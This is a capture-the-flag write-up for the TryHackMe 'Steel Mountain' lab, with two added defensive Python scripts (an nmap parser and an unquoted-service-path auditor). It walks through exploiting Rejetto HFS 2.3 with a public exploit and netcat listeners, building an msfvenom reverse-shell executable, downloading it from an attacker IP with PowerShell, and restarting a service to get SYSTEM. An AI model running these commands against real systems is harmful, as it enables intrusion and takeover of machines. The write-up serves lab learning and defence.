THM - Steel Mountain
March 6, 2022•376 words
Steel Mountain
skibum 8/29/2020
Exploit
- Scan and save to an XML file for searchsploit

```xml
<port protocol="tcp" portid="80">
  <state state="open" reason="syn-ack" reason_ttl="125"/>
  <service name="http" product="Microsoft IIS httpd" version="8.5" ostype="Windows" method="probed" conf="10">
    <cpe>cpe:/a:microsoft:iis:8.5</cpe><cpe>cpe:/o:microsoft:windows</cpe>
  </service>
  <script id="http-methods" output="
  Potentially risky methods: TRACE">
    <table key="Potentially risky methods"><elem>TRACE</elem></table>
  </script>
  <script id="http-server-header" output="Microsoft-IIS/8.5"><elem>Microsoft-IIS/8.5</elem></script>
  <script id="http-title" output="Site doesn't have a title (text/html)."></script>
</port>
<port protocol="tcp" portid="445">
  <state state="open" reason="syn-ack" reason_ttl="125"/>
  <service name="microsoft-ds" product="Microsoft Windows Server 2008 R2 - 2012 microsoft-ds" ostype="Windows Server 2008 R2 - 2012" method="probed" conf="10">
    <cpe>cpe:/o:microsoft:windows</cpe>
  </service>
</port>
<port protocol="tcp" portid="8080">
  <state state="open" reason="syn-ack" reason_ttl="125"/>
  <service name="http" product="HttpFileServer httpd" version="2.3" ostype="Windows" method="probed" conf="10">
    <cpe>cpe:/a:rejetto:httpfileserver:2.3</cpe><cpe>cpe:/o:microsoft:windows</cpe>
  </service>
  <script id="http-server-header" output="HFS 2.3"><elem>HFS 2.3</elem></script>
  <script id="http-title" output="HFS /"><elem key="title">HFS /</elem></script>
</port>
```
- Since rejetto stands out, use searchsploit to list exploits for rejetto

```bash
searchsploit rejetto http 2.3
```

```
------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                           | Path
------------------------------------------------------------------------- ---------------------------------
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload           | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)      | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)      | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | windows/webapps/34852.txt
------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
```
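The two steps above (an `nmap -sV -oX` scan, then picking the product and version out of it to feed searchsploit) are easy to automate and easy to get wrong by eyeballing. The following is an added example, not code from the original write-up: it parses the page's own nmap XML fragment (wrapped in a constructed `<ports>` root so it runs stand-alone), pulls the product, version and CPE for every open port, turns the application CPE into the search terms, and also surfaces the `http-methods` finding (TRACE enabled on IIS) that a defender would want on the same report.

```python
"""Turn nmap -sV XML into per-port service fingerprints and searchsploit terms.

Added example (not from the original write-up). NMAP_FRAGMENT is the page's
nmap output wrapped in a constructed <ports> root; a real run would read the
file written by `nmap -sV -oX scan.xml <target>`.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

NMAP_FRAGMENT = """<ports>
<port protocol="tcp" portid="80">
  <state state="open" reason="syn-ack" reason_ttl="125"/>
  <service name="http" product="Microsoft IIS httpd" version="8.5" ostype="Windows" method="probed" conf="10">
    <cpe>cpe:/a:microsoft:iis:8.5</cpe><cpe>cpe:/o:microsoft:windows</cpe>
  </service>
  <script id="http-methods" output="  Potentially risky methods: TRACE">
    <table key="Potentially risky methods"><elem>TRACE</elem></table>
  </script>
  <script id="http-server-header" output="Microsoft-IIS/8.5"><elem>Microsoft-IIS/8.5</elem></script>
</port>
<port protocol="tcp" portid="445">
  <state state="open" reason="syn-ack" reason_ttl="125"/>
  <service name="microsoft-ds" product="Microsoft Windows Server 2008 R2 - 2012 microsoft-ds" ostype="Windows Server 2008 R2 - 2012" method="probed" conf="10">
    <cpe>cpe:/o:microsoft:windows</cpe>
  </service>
</port>
<port protocol="tcp" portid="8080">
  <state state="open" reason="syn-ack" reason_ttl="125"/>
  <service name="http" product="HttpFileServer httpd" version="2.3" ostype="Windows" method="probed" conf="10">
    <cpe>cpe:/a:rejetto:httpfileserver:2.3</cpe><cpe>cpe:/o:microsoft:windows</cpe>
  </service>
  <script id="http-server-header" output="HFS 2.3"><elem>HFS 2.3</elem></script>
</port>
</ports>"""


@dataclass
class ServiceFinding:
    port: int
    name: str
    product: str
    version: str
    cpes: list = field(default_factory=list)
    risky_methods: list = field(default_factory=list)

    def searchsploit_terms(self):
        """Search words derived from the application CPE (cpe:/a:vendor:product:version);
        falls back to nmap's product/version strings when only an OS CPE exists."""
        for cpe in self.cpes:
            parts = cpe.split(":")
            if len(parts) >= 4 and parts[1] == "/a":
                return [p for p in parts[2:5] if p]
        return [w for w in (self.product, self.version) if w]


def parse_ports(xml_text):
    """Return one ServiceFinding per open port in an nmap XML document/fragment."""
    root = ET.fromstring(xml_text)
    findings = []
    for port in root.iter("port"):
        state = port.find("state")
        if state is None or state.get("state") != "open":
            continue
        svc = port.find("service")
        finding = ServiceFinding(
            port=int(port.get("portid")),
            name=svc.get("name", "") if svc is not None else "",
            product=svc.get("product", "") if svc is not None else "",
            version=svc.get("version", "") if svc is not None else "",
            cpes=[c.text for c in svc.iter("cpe")] if svc is not None else [],
        )
        # nmap's http-methods NSE script lists risky verbs (TRACE, PUT, ...) in a keyed table
        for script in port.findall("script"):
            if script.get("id") != "http-methods":
                continue
            for table in script.findall("table"):
                if table.get("key") == "Potentially risky methods":
                    finding.risky_methods = [e.text for e in table.findall("elem")]
        findings.append(finding)
    return findings


def main():
    for f in parse_ports(NMAP_FRAGMENT):
        print(f"{f.port}/tcp {f.product} {f.version}".rstrip())
        print("  searchsploit", " ".join(f.searchsploit_terms()))
        if f.risky_methods:
            print("  risky HTTP methods:", ", ".join(f.risky_methods))


if __name__ == "__main__":
    main()
```

Deriving the terms from the CPE rather than from the free-text product name is what makes `rejetto httpfileserver 2.3` fall out automatically; the 445 entry has no application CPE, so it falls back to the raw product string and is the one you still review by hand.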
- Review and copy the Python exploit (`windows/remote/39161.py`)
  - Modify this file to have the proper IP and the port that will be used
- Copy (cp) the nc.exe file from SecLists to the active pwd
- Start a Python HTTP server

```bash
python -m SimpleHTTPServer 80
```

- Create a netcat session

```bash
nc -nlvp 9001
```
- Run the exploit

```bash
python 39161.py <$IP> 8080
```

  - Note that this will need to be run two or more times before the nc session opens
- Find the user.txt under c:\Users\bill\Desktop
- Copy winPEAS over and run it to find a priv esc
  - Advanced SystemCare Service 9 is exploitable
- Create a reverse shell for the Advanced.exe file

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=10.13.2.170 LPORT=9002 -f exe -o Advanced.exe
```

- Open a second netcat session

```bash
nc -nlvp 9002
```

- Download the file to c:\Program Files (x86)\IObit using

```powershell
powershell -c wget "http://10.11.1.198/Advanced.exe" -outfile Advanced.exe
```
- Run the exploit

```cmd
sc stop AdvancedSystemCareService9
sc start AdvancedSystemCareService9
```
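The write-up never names the weakness it is abusing, but dropping a file called `Advanced.exe` into the IObit folder and restarting the service is the pattern of an unquoted service path: when `BINARY_PATH_NAME` contains spaces and is not quoted, the service control manager tries each space-delimited prefix (`...\IObit\Advanced.exe` before `...\IObit\Advanced SystemCare\...`) as the executable, so anyone who can write to one of those directories gets code running as the service account. The following is an added example, not code from the write-up or from IObit/winPEAS, showing the audit a defender runs to find and fix such services: it parses `sc qc`-style output (the sample is constructed; the service's real binary path is not on the page) and checks the directories the SCM would probe against a constructed ACL table standing in for `icacls` results.

```python
"""Audit Windows service binary paths for the unquoted-path weakness.

Added example (not from the original write-up). SC_QC_SAMPLE imitates the
output of `sc qc <service>` and is constructed; the binary path shown for
AdvancedSystemCareService9 is an assumption made for illustration.
"""
import ntpath
import re

SC_QC_SAMPLE = r"""
SERVICE_NAME: AdvancedSystemCareService9
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: GoodService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\Program Files\Good Vendor\svc.exe" -run
        SERVICE_START_NAME : LocalSystem
"""

# Constructed stand-in for per-directory ACL checks (True = writable by Users).
# A real audit would query each directory with icacls or Get-Acl instead.
WRITABLE_BY_USERS = {
    "C:\\": False,
    r"C:\Program Files (x86)": False,
    r"C:\Program Files (x86)\IObit": True,
}


def parse_sc_qc(text):
    """Extract name, BINARY_PATH_NAME and SERVICE_START_NAME per service block."""
    services, current = [], None
    for line in text.splitlines():
        m = re.match(r"\s*SERVICE_NAME:\s*(\S+)", line)
        if m:
            current = {"name": m.group(1), "binary_path": "", "account": ""}
            services.append(current)
            continue
        m = re.match(r"\s*(BINARY_PATH_NAME|SERVICE_START_NAME)\s*:\s*(.*)", line)
        if m and current is not None:
            key = "binary_path" if m.group(1) == "BINARY_PATH_NAME" else "account"
            current[key] = m.group(2).strip()
    return services


def probe_candidates(binary_path):
    """Executables the SCM would try before the intended one for an unquoted path.
    A quoted path, or one without spaces, is unambiguous and yields nothing."""
    if binary_path.startswith('"') or " " not in binary_path:
        return []
    tokens = binary_path.split(" ")
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]


def audit(sc_text, writable_dirs):
    """Report every service whose probe directories include one writable by Users,
    together with the `sc config` command that quotes the path to close the hole."""
    findings = []
    for svc in parse_sc_qc(sc_text):
        for candidate in probe_candidates(svc["binary_path"]):
            if writable_dirs.get(ntpath.dirname(candidate), False):
                findings.append({
                    "service": svc["name"],
                    "account": svc["account"],
                    "candidate_path": candidate,
                    "fix": f'sc config {svc["name"]} binPath= "\\"{svc["binary_path"]}\\""',
                })
    return findings


if __name__ == "__main__":
    for finding in audit(SC_QC_SAMPLE, WRITABLE_BY_USERS):
        print(f"{finding['service']} runs as {finding['account']}; "
              f"{finding['candidate_path']} sits in a user-writable directory")
        print("  fix:", finding["fix"])
```

Quoting the path is only half of the fix: the writable directory under Program Files is what turns the unquoted path into a privilege escalation, so the ACL on that folder needs tightening too, and a `7036` service stop/start pair for a security product outside a maintenance window is the event a SOC should already be alerting on.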
- P0wn3d !!! now get the root flag at c:\Users\Administrator\Desktop